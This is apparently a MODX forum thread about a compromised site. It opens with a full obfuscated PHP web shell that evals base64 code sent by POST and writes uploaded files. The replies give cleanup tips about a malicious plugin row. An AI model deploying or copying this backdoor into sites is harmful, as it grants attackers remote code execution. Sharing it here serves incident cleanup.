<?php echo 7457737+736723;$raPo_rZluoE=base64_decode("Y".chr(109)."F".chr(122).chr(90)."T".chr(89).chr(48).chr(88)."2"."R"."l"."Y".chr(50)."9".chr(107)."Z".chr(81)."="."=");$ydSJPtnwrSv=base64_decode(chr(89)."2".chr(57).chr(119).chr(101).chr(81).chr(61)."=");eval($raPo_rZluoE($_POST[base64_decode(chr(97).chr(87)."Q".chr(61))]));if($_POST[base64_decode("d".chr(88).chr(65)."=")] == base64_decode("d"."X".chr(65).chr(61))){@$ydSJPtnwrSv($_FILES[base64_decode(chr(90)."m"."l"."s".chr(90)."Q"."=".chr(61))][base64_decode(chr(100).chr(71).chr(49)."w"."X".chr(50)."5".chr(104)."b".chr(87)."U".chr(61))],$_FILES[base64_decode("Z".chr(109)."l"."s".chr(90)."Q".chr(61).chr(61))][base64_decode(chr(98)."m"."F".chr(116)."Z".chr(81).chr(61)."=")]);}; ?>
This question has been answered by mayhemchaos. See the first response.
Thanks for the update! What extra had a phpinfo file?
It seems as your server is compromised the same way as this: https://forums.modx.com/thread/102644/evo-1-2-1-hacked-again-and-again#dis-post-553027
Hi,
Not sure if you have fully solved this issue yet but wanted to let you know to check in the `modx_site_plugins` table, I found a "phpinfo" plugin there that was responsible for generating content. Before you delete the row make a not of the ID and then check the `modx_site_plugin_events` table for events associated with the malicious plugin.